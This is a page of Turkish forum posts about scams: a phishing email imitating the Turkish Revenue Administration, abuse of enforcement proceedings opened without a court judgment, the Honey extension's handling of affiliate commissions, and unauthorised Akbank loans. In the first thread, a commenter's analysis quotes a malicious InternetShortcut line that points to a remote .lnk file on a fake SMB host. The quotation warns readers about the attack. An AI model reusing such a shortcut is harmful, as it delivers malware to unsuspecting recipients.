Merhaba;

Lütfen dikkat edin, #Pishing yöntemi olarak bunu türetmişler galiba. Kurumsal bir firmaya bunu göndermiş, firmanın İstanbul ile herhangi bir bağlantısı bulunmuyor. Hem Windows dosya'da virüs buldu, hem de ChatGPT ile sorgulayınca yönlendirmeli bağlantılar saptandı, buradan da dikkat etmeniz için ufak bir hatırlatma olsun.

Not: İçeriğinden ve geliş saatinden şüphelendik, e-mail servisi de direkt bunu spam'a taşımış.

#SpamMail #dolandırıcılık

BeğenFavori PaylaşYorum yap
  • Behzat Ç. @behzat

    Gönderici adresi resmi duruyor ?

    • Ahmet Tokyüz @atokyuz

      1️⃣ ZIP Dosyası İçeriği:
      ZIP dosyası içerisinde sadece bulut-sorusturma-06-05-2025-id-ist9930234.url adında bir URL dosyası bulundu.

      2️⃣ URL Dosyası İçeriği:
      URL dosyasının içeriği şu şekildeydi:

      ini
      Kopyala
      Düzenle
      [InternetShortcut]
      URL=file://cloud.gib.sorusturma-reconnect.6b6vg5migs.govtrd.store/smbpaylasim/dmca.lnk
      InternetShortcut: Bu, bir bağlantı kısayoludur. Tıklandığında doğrudan belirtilen adrese gider.

      3️⃣ Alan Adı Analizi:
      cloud.gib.sorusturma-reconnect.6b6vg5migs.govtrd.store

      .gov.tr yerine .govtrd.store kullanılmış.

      Türkiye'deki resmi devlet siteleri her zaman .gov.tr uzantısına sahiptir.

      .store uzantısı, sahte bir domain olduğunun güçlü bir göstergesidir.

      4️⃣ Protokol Kullanımı:
      URL, file:// protokolü ile başlıyor.

      file://, yerel ağda veya cihazda dosya çalıştırmaya olanak sağlar.

      Bu tip protokol kullanımı, kötü amaçlı dosyaları uzaktan çalıştırmak veya ağ üzerinde virüs yaymak için kullanılır.

      5️⃣ SMB Paylaşımı (Server Message Block):
      URL'nin devamında /smbpaylasim/dmca.lnk ifadesi var.

      smbpaylasim: SMB (Server Message Block) dosya paylaşımı protokolü.

      Kötü niyetli yazılımlar genellikle SMB protokolünü kullanarak ağdaki diğer cihazlara bulaşır.

      Bu yapı, sisteme yetkisiz erişim sağlamak amacıyla oluşturulmuş olabilir.

      6️⃣ Güvenlik Kontrolleri:
      Alan adı sorgulaması yapıldığında, bu domainin resmi bir GİB sayfası olmadığı tespit edildi.

      Yönlendirmeler tamamen sahte bir alan adına yapılmış.

      7️⃣ E-Posta Güvenliği:
      GİB (Gelir İdaresi Başkanlığı) genelde e-posta yoluyla ZIP dosyası göndermez.

      E-posta başlığı ve içerik yapısı sahte ve profesyonelce hazırlanmış.

      SPF, DKIM, ve DMARC güvenlik kontrollerinden geçememiş.

    • arthapot @arthapot

      @atokyuz bunu nerde yaptın böyle bir site mi var? Dosyaları attığın maileri böyle analiz eden ?

    • arthapot @arthapot

      @atokyuz tşk dosyayı mı yükledin direk zip ı hangisinde bu imkan var ?

  • dQw4w9WgXcQ @ugurcansayan

    Konu başlığı hatalı, gönderim zamanı hatalı, yazımı hatalı, imzası hatalı. Bir tek gönderen adresini güzel maskelemişler, ama onun da adı hatalı. Dosyanın ekte olduğu ve ektekinin ne olduğunu düzgün bir şekilde belirtilmemiş. Dolandırıcı puanım 2/10

  • Ferah @ferah

    Maksat zip dosyasını açtırmak demekki
    Çok sade, çok profesyonel

  • Hamit ÖZLÜ @hamitozlu

    çok iyiyimiş peki bu maili nasıl oluşturmuşlar?

#Dolandırıcılık Tesadüfen önüme düşen video'da #ilamsız icra diye bir şey öğrendim. Bu ne saçmalık anlamadım burada avukat veya avukat tanıdığı olan var mı? Adamın kimlik bilgileri ve adresini bilen dolandırıcı ilamsız icra takibi başlatıyor sana evrak geliyor sen tatildesin ya da sallamadın durumu benim borcum kimseye yok anlamam diyorsun 7 gün içinde itiraz etmesen kabul edilmiş oluyormuş, saçmalığa bak dolandırıcı gidip icra dairesinden gidip icra takibi başlatıyor bir de kabul ediliyor 😀
--- Bu açılan ilamsız icra takibi üst TL limiti ne?
--- Bu dolandırıcılara çanak tutan şeyi neden değiştirmiyorlar
--- Kişinin borcu olduğuna dair belge şu bu kanıt olmadan nasıl açılır ayrı bir saçmalık
https://youtu.be/Rg_461oVxKo?si=HmFKdySu-8irzOdi&t=1145

Cep Telefonu Üzerinden Banka Hesaplarınızı Böyle Boşaltıyorlar | 30...

Birbirinden farklı dolandırıcılık yöntemlerini teker teker açıklayan 30 yıllık avukat Cengiz Hortoğlu ile aklınızdaki tüm sorulara cevap olacak nitelikte bir...
BeğenFavori PaylaşYorum yap
  • Höşelek @benvaryaben

    kapitalist sistemin saçmalıkları işte. kapitalist yasalar ancak sermayeye çalışır. kişiler arası hukuk çok da sallanmaz. sonuç olarak böyle saçma sapan şeylerler karşılaşırız. bir milletvekili olmak için ilkokul mezunu olmak yeterliyken o meclisten çok da bişey beklememek lazım.

    benzer bir saçmalık da geçen duydum. araç sigortası karşıdaki zararın tazminini yapıyor sonra suç sende diye parasını istiyormuş. ulen ben sana niye para verdim o zaman. inanılmaz gerçekten.

  • OrcunFix @orcunfix

    Örnek verelim. Mesela gittim herhangi bir adliyede icra dairesine @tabayea bana 30 bin dolar borcu var elden verdim paramı da vermedi deyip ilamsız icra takibi başlatıyorum. İcra müdürlüğü sana posta yoluyla kağıt yolluyor o kağıdı alıp sende icra müdürlüğüne gidip 7 iş günü içinde itiraz etmezsen evet bana borcun var diye devlet varsayıp senin bütün malına mülküne hesaplarına vs çökebiliyorum. Çalışıyorsan da maaşının yüzde 25'ini alabiliyorum vs. sistem böyle. :/

  • Atilla Durmaz @limonlusoda

    Sistem tam olarak o amaçlı değil ama durum biraz öyle evet. İlamsız icra alacaklının yasal olarak alacağını hızlı alması için yapılmış bir sistem. Haksız yere icraya verilme durumunda ise sistemde bir açık var. Şöyle ki sistem itiraz süresini geçirir iseniz borcu kabul ettiniz sayıyor. Ancak buna yine de borca itiraz edip menfi tespit davası açıyorsunuz. Burada sistem tamamen iki tarafında korunması için var ama köhne ve açıklar ile dolu. Çünkü bu süreçte sizin parayı mahkemeye yatırmanız gerekiyor. Mahkeme bu süreçte parayı alıp davacıya diyor ki getir evraklarını görelim borç belgesini. Bu süreç çok uzun sürmüyor ve borç kanıtlanamaz ise karşı haklarınız doğuyor elbette. Babam yaşadığı için birkaç kez karşılaştık bu durumla. Bildiğim kadarıyla UYAP sistemine SMS icin kayıt olabiliyorsunuz. Bu kadar saçma davalarla falan uğraşmamak için sisteme kayıt olmakta fayda var. Herhangi bir dava ve icra dosyası durumunda bilgi geliyor size. Aynı şehirde olmanıza gerek yok itiraz için. Onu da belirteyim. Diyelim ki tatilde denk geldiniz ve gidemeyeceksiniz evinize. Bulunduğunuz bölgedeki mahkemeye gidip dilekçe veriyorsunuz o icra dairesine gönderilmek üzere. Hallediliyor. Eksiklerim veya anlatım bozukluklarım varsa kusura bakmayın. Bilgi olsun bilmeyenlere.

  • Kerem @deadpool

    bana ilamsız icra açmışlardı zamanın da ödedim 2 yıl sonra bir daha aynı borç için açmışlar karşı avukata ulaştım ne bu her yıl aynı para isteme ödeme dekontunu attım iptal edicez dediler yanı görmesek sürekli aynı parayı ödetecekler.

#Honey isimli bir web tarayıcı eklentisi varmış. Ben de ilk defa duydum. Türkiye'de pek bilinmiyor olabilir, ancak Amerika’da oldukça popüler ve influencer'lar tarafından uzun zamandır öneriliyormuş.

Ancak MegaLag isimli bir YouTube kanalı, bu sitenin #dolandırıcılık ( #scam ) yaptığını iddia eden bir video yayınlamış. Ardından Marques Brownlee de bu konuyla ilgili bir açıklama yapmış.

Detayları incelemek isterseniz, işte ilgili video:
https://www.youtube.com/watch?v=vc4yL3YTwWk

MKBHD: https://www.youtube.com/watch?v=EAx_RtMKPm8

Exposing the Honey Influencer Scam

Was Honey a legitimate money saving tool? Or just an affiliate marketing scam promoted by some of YouTube's biggest influencers?If you have any inside inform...
BeğenFavori PaylaşYorum yap
  • Boba Fett @bobafett

    Amerika odaklı, kendine ait veya netten bulduğu kodları deneyen bir eklenti izlenimi verdi. Benzerleri pek bir işe yaramıyordu. Kapaktakileri komisyon ile kendilerine mi bağlamışlar?
    Bizde de bir kaç indirim kodu paylaştığı söyleyen siteler var, bir çoğunun içeriği işe yaramıyor.

    • berrram @berrram

      Aslında kapaktakiler bu eklentiyi önererek kendi alacakları komisyonu farkında olmadan eklentinin almasını sağlamışlar ki zaten eklentinin sahibi de PayPal'mış. Ödeme ekranında indirim kodu var mı diye kontrol ettirirken ya da yoksa bile eklenti pop-up'ına tıklatarak referans çerezini değiştirip komisyonu kendileri alıyormuş.

    • dQw4w9WgXcQ @ugurcansayan

      @berrram + Satış sitesi ne kadar indirim yapılmasını istediğini Honey ile anlaşarak sözde kuponlar sayesinde fiyat kontrolü yapabiliyor.

  • Türker Sezer @dirigeant

    Honey'i bir sure once PayPal aldi. Isin icinde bir dolandiricilik oldugunu sanmiyorum zira hem kullaniciya zarar verebilecek bir islevi yok hem de PayPal'in "dolandiricilik" gibi bir topa girecegini sanmam.

    Tarayici eklentisi,
    - Odeme sayfasinda kupon kodu kismi varsa ve siteyi taniyorsa otomatik olarak sistemindeki kuponlari deniyor, calisanlar icin toplam fiyati kontrol ediyor ve en cok indirim yapani uyguluyor.
    - Tanidigi sitelerdeki urunler icin fiyat gecmisi gosteriyor. Amazon'da alisveris yaparken "urunun fiyati eskiye gore dusmus" ya da "urun normalden daha pahali" vs. diye uyariyor. Tikladiginizda gecmis ornek verileri gosteriyor.
    - Anlasmali siteler/firmalardan alisveris yaparken etkinlestirirseniz farkli oranlarda puanlar veriyor. Daha sonra biriken puanlari amazon hediye karti vs. olarak nakite cevirebiliyorsunuz.

  • Emrah Öztürk @emrah-ozturk

    Bu videoyu henüz izlemedim ama adı geçtiği için MKBHD de bir video yayınladı:
    https://youtu.be/EAx_RtMKPm8?si=KCWM3x2T7s-R_kgt

    Anladığım kadarıyla bildiğimiz anlamda bir scam değil. Hatta kullanıcıdan bir şey çalmıyor da iddiasını yerine getirmek yerine kendi çıkarını koruyor. Hem affiliate linkleri kendi linki ile değiştirip link sahibinin elde edeceği kazancı cebe atıyor, hem de alışveriş siteleri ile komisyon anlaşması yaparak en yüksek kupon yerine daha makul bir kupon veriyor, daha doğrusu sitelere bana 3-5 bişey atarsanız en iyi kuponu veriyormuş gibi yapıp düşük indirimli bir kupon kullandırırım diyor.

Akbank mağduriyeti devam ediyor deniliyor;

Dün yayınlanan bir video yayın yapan kadını tanımıyorum ama mağdurların yazdıklarını okuyor 6:50 de bir mağdur araştırmış kendi cabası ile onun hesabından ve kendi ile beraber 7 kişinin daha hesabından yüklü miktarda para çekilip aynı anda aynı saatlerde tek kişinin hesabına atılmış ve banka bu işlemden şüphelenmemiş.

ek1: 9:05 deki mağdurda başka bankalarda hesabında para olmasına rağmen tek Akbank'a girip boş hesaptan kredi çektirilip hemen 1 dk içinde başka hesaba havale edildiğini anlatıyor diğer bankalarda ki paralara dokunulmamış demek ki girememişler.

ek2: 11:45 deki olaydada telefon hacklemesi olmadan kart bilgileri ile alışveriş üyelik vs yapılmış bu nasıl bulunamıyor yemek siparişleri adrese Netflix üyeliği bir ip'den izlenecek bunlar çok pro gelmedi bana mesela çoluk çocuk gibi geldi bunlar bile nasıl ele geçirdi bilgileri.

https://www.youtube.com/watch?v=9Wc0945gtgY

#akbank #dolandırıcılık

AKBANK MAĞDURLARI İZİNSİZ KREDİLERLE BOĞUŞUYOR! AKBANK NEDEN ÖNLEM ALMIYOR?

Akbank skandalı büyümeye devam ediyor. İzinsiz kullandırılan kredilerin sayısı her geçen gün artarken, bankanın hala bir önlem almamış olması da dikkat çekic...
BeğenFavori PaylaşYorum yap

Buda farklı bir olay,
Yurt dışında yaşıyor marketlerden kart boşaltılmış. Üstelik iddia ettiğine göre yurt dışında kullanıcam demiş yani Tr içindeki harcama şüpheye düşmesi lazım. Yorumlarıda okuyor iddiaya göre kapalı hesaba bile kredi başvurusun da bulunulmuş. Yorumlara verdiği cevaplara baktım yanlış anlamadıysam iddia ettiğine göre sadece, meşhur P ile başlayan bir uçak firmasından bilet almış ve meşhur L ile başlayan bir kıyafet mağazasından kıyafet almış ama o yurt dışında galina kart ile.

Sabah uyanıp başımıza gelecek diye korku ile uyuyoruz artık 🙁 ( Allahım koru )

NOT: Vİdeoyu kaldırtmışlar kanal bu 2-3 video var bu konuda ve muhtemelen video geri yayınlanır çünkü Youtubede kurallarını ihlal edecek bir şey yoktu videoda.
( Kadının kanalı: https://www.youtube.com/@Albhaber )

https://www.youtube.com/watch?v=kJDx6YpiLTk

#dolandırıcılık #Bankacılık #akbank

BeğenFavori PaylaşYorum yap
Önceki yorumları gör 6 / 12

Murat Ağırel'in bu günkü canlı yayında anlattıklarına göre İOS cihazı olan telefonu uçak modunda olan kadının hesabından SMS dahi gelmeden gece 300 bin kredi çekip başka hesaplara atmışlar, başka bir olayda yaşlı bir çift bunlar tuşlu telefon kullanıyor mobil bankacılıkları yok kapalı, tatildeyken sahte kimlik bilgileri ile mobili aktif edip birikimleri olan 15 milyonu çalıp borsa fonlarını bozdurup çalıp gitmişler şubeye para çekmeye gidince fark edilmiş. Bu tabloda bırak para koymayı bankada boş hesabın bile varsa ondan bile para çalıp borçlu bırakabilirler. Çok karanlık bir durum.
Bankalar neden 2 faktörlü korumayı kullanmıyor şu sürekli değişen şire olan.
Yayını sorunlar olmuş bırakıyorum buraya.
Yayın bu: https://m.youtube.com/watch?v=U8E2fKXj5iY
Dk: 1:27:30 dk’dan itibaran

#güvenlik #Bankacılık #dolandırıcılık #MobilBankacılık

BeğenFavori PaylaşYorum yap
Önceki yorumları gör 8 / 33
BeğenFavori PaylaşYorum yap
Önceki yorumları gör 6 / 7